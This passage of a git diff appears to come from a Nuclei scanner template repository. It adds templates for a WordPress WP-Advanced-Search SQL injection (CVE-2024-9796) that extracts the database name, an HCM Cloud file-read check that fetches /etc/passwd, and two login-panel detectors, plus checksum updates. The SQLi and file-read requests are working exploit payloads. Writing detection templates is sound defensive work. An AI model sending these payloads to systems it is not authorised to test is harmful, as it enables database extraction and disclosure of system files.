4a0a00473045022065893bee95b4cb863eb698bc33aef1849b6971633dc55d38e63de16d89b20d8e022100916a86a5a8ba50bef07761ba790afe74cf0ab95d95dfc115f03e95f72a607648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-9796.yaml b/http/cves/2024/CVE-2024-9796.yaml new file mode 100644 index 0000000000..7f6208b392 --- /dev/null +++ b/http/cves/2024/CVE-2024-9796.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-9796 + +info: + name: WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection + author: s4e-io + severity: critical + description: | + The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/ + - https://github.com/RandomRobbieBF/CVE-2024-9796 + - https://nvd.nist.gov/vuln/detail/CVE-2024-9796 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9796 + cwe-id: CWE-89 + epss-score: 0.00106 + epss-percentile: 0.44161 + metadata: + max-request: 1 + verified: true + vendor: mathieu_chartier + product: wp-advanced-search + framework: wordpress + fofa-query: body="/wp-content/plugins/wp-advanced-search/" + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: database_name + regex: + - "([a-zA-Z0-9_]+)\\.wp_users" +# digest: 4a0a0047304502204d1fa41448e33d7bdc708a0c0cfefcb5cb74c19e863fdd219d62933fbfed9427022100979820fcbf072d12baefa23aca5ee99edaac434379017e9b00feb2abab3de987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/1password-scim-panel.yaml b/http/exposed-panels/1password-scim-panel.yaml new file mode 100644 index 0000000000..d971b8a591 --- /dev/null +++ b/http/exposed-panels/1password-scim-panel.yaml @@ -0,0 +1,30 @@ +id: 1password-scim-panel + +info: + name: 1Password SCIM Bridge - Panel + author: Splint3r7 + severity: info + description: | + 1Password SCIM Bridge Login was detected. + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"1Password SCIM Bridge Login" + tags: panel,1password,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'contains_any(body, "1Password SCIM Bridge Login", "scim-bridge-logo")' + - 'status_code == 200' + condition: and +# digest: 4a0a004730450220273efa2c962c1449fec38b3d098131d1a6662c122f71a2546cf4457f462e2fc5022100ec141b841154859bb27c6ad26e87c9a5e934fdf5ad1f71da7d12216d506c96ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/reolink-panel.yaml b/http/exposed-panels/reolink-panel.yaml new file mode 100644 index 0000000000..f7ecfc6408 --- /dev/null +++ b/http/exposed-panels/reolink-panel.yaml @@ -0,0 +1,30 @@ +id: reolink-panel + +info: + name: Reolink Panel - Detect + author: s4e-io + severity: info + description: | + Reolink panel was discovered. + metadata: + verified: true + max-request: 1 + fofa-query: "Reolink" + shodan-query: title:"Reolink" + tags: panel,login,reolink,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'contains(body, "Reolink")' + - 'status_code == 200' + condition: and +# digest: 4b0a00483046022100972074f41e35ce0c2c5e9c66f417208fe38d99127faac925683889cbe52c9700022100dbb2f66c6e5448bfa41dce0ecae14894006d99baa678514d395d2db8acbf344f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/hcm/hcm-cloud-lfi.yaml b/http/vulnerabilities/hcm/hcm-cloud-lfi.yaml new file mode 100644 index 0000000000..4522d46342 --- /dev/null +++ b/http/vulnerabilities/hcm/hcm-cloud-lfi.yaml @@ -0,0 +1,30 @@ +id: hcm-cloud-lfi + +info: + name: HCM Cloud - Arbitrary File Read + author: s4e-io + severity: high + description: | + HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability. + reference: + - https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw + - https://github.com/wy876/POC/blob/main/%E6%B5%AA%E6%BD%AE%E4%BA%91/HCM-Cloud%E4%BA%91%E7%AB%AF%E4%B8%93%E4%B8%9A%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%B9%B3%E5%8F%B0download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-859381597" + tags: hcm-cloud,lfi,hcm + +http: + - method: GET + path: + - "{{BaseURL}}/api/model_report/file/download?index=/&ext=/etc/passwd" + + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - 'contains(content_type, "application/octet-stream")' + - "status_code == 200" + condition: and +# digest: 4a0a00473045022026d56dc5db7d021f9588ce83480002e6e15ec8a5b9d2247a75272f80ddc3e6d302210090d0666fb6a8b8fa1f467c96c1103565befbdbfda3b88aa72ab7266ae13f84e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates-checksum.txt b/templates-checksum.txt index 4bf3f883bb..10bcf77018 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -29,6 +29,10 @@ cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:3a67a177c3537b361b26b549a cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:660261dce36382f203ec7e16e01d2e29f9bf7836 cloud/aws/cloudwatch/cw-alarm-action-set.yaml:b02b7e970b71be76717b5fc7e132b23adb5048e0 cloud/aws/cloudwatch/cw-alarms-actions.yaml:f0198d619bebd6afa41568d0c8c9bac456261021 +cloud/aws/dms/dms-multi-az.yaml:cb3e1113188a1770d764c97a19ea3d608a3ff718 +cloud/aws/dms/dms-public-access.yaml:e8eee10542c4723e8cec23eb25eaa536f8ba4fbd +cloud/aws/dms/dms-version-upgrade.yaml:969893df5f59cb6d06ce7e156028baa3a23682b0 +cloud/aws/ebs/ebs-encryption-disabled.yaml:c7ccebdd432abae71c809226591cf9ace3cacad3 cloud/aws/ec2/ec2-imdsv2.yaml:bb7909c4b9b433dd90c343b3a03122f9c5c310a0 cloud/aws/ec2/ec2-public-ip.yaml:5fb5ee7dd9d51781a4a2903a0cb05b21fa586f85 cloud/aws/ec2/ec2-sg-egress-open.yaml:047f551aa108926349f69ba8d47189d88b7aab01 @@ -54,6 +58,8 @@ cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33 cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a cloud/aws/ec2/publicly-shared-ami.yaml:49e3f4939b9991f5ac9db99fbb7f7caba021227d cloud/aws/ec2/unencrypted-aws-ami.yaml:35fc4a61e70120df3aafba92b4153ffa5b8c92b6 +cloud/aws/firehose/firehose-server-destination-encryption.yaml:8d734f21761ffb41988d3d216b7e9f7aa7bd5f48 +cloud/aws/firehose/firehose-server-side-encryption.yaml:5e78f1b9a1d2eeb44b87f9af6d9699a493b4e80a cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9 cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8 cloud/aws/iam/iam-full-admin-privileges.yaml:ab5d0948a725aa5a9a1059d6b7c0ae9f5d846d06 @@ -419,8 +425,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:74b3e1af12d1f57440d4bbd006dacf6eda56785a -cves.json:1f9c64298a7fdb69876fad1267c4671f73a5a024 -cves.json-checksum.txt:b7786a85233a460e34b9cd4fb0f0b8d7d9290e4f +cves.json:d801cb10fa8d00e27a3846145d6634c66bafccf8 +cves.json-checksum.txt:4143244c4fec9f8bedb78c0ceb14a368b532782c dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3672,6 +3678,7 @@ http/cves/2023/CVE-2023-6909.yaml:49445ba4c9f3657098a5b90e0139e370ad4b0e22 http/cves/2023/CVE-2023-6977.yaml:92c599645f0079a1292d86ff4c56dddc787b5818 http/cves/2023/CVE-2023-6989.yaml:f42110a36f2bf7b8c62a72a752a69c8db52480c5 http/cves/2023/CVE-2023-7028.yaml:0ce7fc4083aa99ba9c914582ed064b84b50d22a2 +http/cves/2024/CVE-2016-9299.yaml:9d44b30c8d0646f6e537110619b64cea85d33025 http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2 http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a @@ -3873,7 +3880,7 @@ http/cves/2024/CVE-2024-4885.yaml:4ed235e0b33138d6382df49594465c551a54c788 http/cves/2024/CVE-2024-48914.yaml:b27547a769516a91b02ffd72ac8f8ce32da86482 http/cves/2024/CVE-2024-4940.yaml:5ce4ed65bd103d8a7791414015bb8cf507885305 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a -http/cves/2024/CVE-2024-49757.yaml:249c629be1603354f68060f37cf6398221f30222 +http/cves/2024/CVE-2024-49757.yaml:5a48ed3ba12227bae818ea35a200145217b35d3f http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5217.yaml:4fadf394def4c4b705871b805aced6715c7a2a06 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c @@ -3940,10 +3947,13 @@ http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747 http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738 http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd http/cves/2024/CVE-2024-9014.yaml:ea54c9f07357a92fb915794e7be909d11545753f +http/cves/2024/CVE-2024-9061.yaml:9c44d7fb4a27fd9f40a791d617b7e21981772b70 http/cves/2024/CVE-2024-9234.yaml:b8d98cd3fce5725e967dfb1c4cc22b4eefcbcd7c http/cves/2024/CVE-2024-9463.yaml:80dc0d8f82b6d69a77dbdbfcc20988bbcfbc83f1 http/cves/2024/CVE-2024-9465.yaml:cc95c8e163ea7ba487f5a09bddc953485559de1c +http/cves/2024/CVE-2024-9593.yaml:b5592584dd80c8cd4e33f192f0142a28e11ce557 http/cves/2024/CVE-2024-9617.yaml:7cb4fee2a032853c8bdab68ab3ab8fad718c3a23 +http/cves/2024/CVE-2024-9796.yaml:63320eed168e12210192edea9a986bee738d4ae5 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -4167,6 +4177,7 @@ http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287 http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4 http/default-logins/zebra/zebra-printer-default-login.yaml:e8e3085df0ca4f9062f0c10855e1c1b6908ec189 http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17 +http/exposed-panels/1password-scim-panel.yaml:65a0e1ff296b07247ef0292119dc45de6332f9df http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cca5984 @@ -4866,7 +4877,7 @@ http/exposed-panels/ollama-llm-panel.yaml:d03925e708d955ad60baf6e1114cae81bbc0c2 http/exposed-panels/olt-web-interface.yaml:bd13acc8c195cbf26aa41fe65aa499740e6332e4 http/exposed-panels/olympic-panel.yaml:858b214bfbb07e460ff29ba93cada9e90b22cef6 http/exposed-panels/omniampx-panel.yaml:56105e601d3cc844fb99879aa995176faac92dcf -http/exposed-panels/onedev-panel.yaml:778521f437f02b656bcb661a0799a2974d43ea55 +http/exposed-panels/onedev-panel.yaml:6aec846d56b8cb5b0aceddf0267a858c53c7cc90 http/exposed-panels/onlyoffice-login-panel.yaml:044f6d420976bc9f2a4063cfe33d22ab3b4ea351 http/exposed-panels/open-game-panel.yaml:59efeff7e08a70e689ab77521a82be8e41709028 http/exposed-panels/open-stack-dashboard-login.yaml:68ffbeb500d7df7d11de2f399d5579983e714ef7 @@ -5015,6 +5026,7 @@ http/exposed-panels/regify-panel.yaml:7af46ff8dbd0743a178b02b1c8ce2c2206ec5ae5 http/exposed-panels/remedy-axis-login.yaml:b676bbce4e0ea774bff50f84e9bce159c790ca6f http/exposed-panels/remkon-manager-panel.yaml:7aaca85bb4d742edb3cafe770445522d2ff3b31d http/exposed-panels/remote-ui-login.yaml:0335d3e84ec1b5927b4e71e30de2fcacd40a33c3 +http/exposed-panels/reolink-panel.yaml:3608e84b6525ab89f7b9a809e5e4ff9330e850fc http/exposed-panels/repetier-server-panel.yaml:6b57a80bb46f006aa09fa69262e84ead2ba276c0 http/exposed-panels/reportico-admin-panel.yaml:a456a00c6ced7e1c1096511440e45372e017a0b8 http/exposed-panels/residential-gateway-login.yaml:6245630106f122c0ed93fcc79e8ee754e90b2bbc @@ -8479,6 +8491,7 @@ http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:6c4f889193935b21ef25bdb52479408 http/vulnerabilities/gradio/gradio-lfi.yaml:34910ba1e5d2d62b9415ff89e9632e0a97198745 http/vulnerabilities/gradio/gradio-ssrf.yaml:c81b4d852de367dd51aa3c7a60a11672e92da709 http/vulnerabilities/grafana/grafana-file-read.yaml:953afdafb26e334177fd5a29c88434674d13b6e2 +http/vulnerabilities/hcm/hcm-cloud-lfi.yaml:fb9dd54d8b49f84fc193bada0f5a4de09f7864b7 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:d4a5f3853a70adea141b8d68ee9a7c2d6ef44545 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 @@ -9539,7 +9552,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cce82f1b617c661f4ecb3a3b9b70f4aef6ecd42f +templates-checksum.txt:b3593609a5c788fe4bf0ad23ac7b9030d7031bb4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4